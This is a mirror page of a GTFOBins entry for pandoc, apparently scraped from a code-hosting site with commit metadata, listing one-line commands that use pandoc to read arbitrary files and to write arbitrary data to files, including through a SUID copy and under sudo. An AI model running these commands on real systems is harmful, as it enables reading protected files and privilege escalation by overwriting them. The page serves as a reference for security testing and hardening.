1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-19 02:11:39 +02:00
GTFOBins.github.io/_gtfobins/pandoc.md
pad0van 706f022480
Add pandoc
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2022-12-16 14:36:44 +01:00

413 B

functions
file-read file-write suid sudo
code
LFILE=file_to_read pandoc -t plain "$LFILE"
code
LFILE=file_to_write echo DATA | pandoc -t plain -o "$LFILE"
code
LFILE=file_to_write echo DATA | ./pandoc -t plain -o "$LFILE"
code
LFILE=file_to_write echo DATA | sudo pandoc -t plain -o "$LFILE"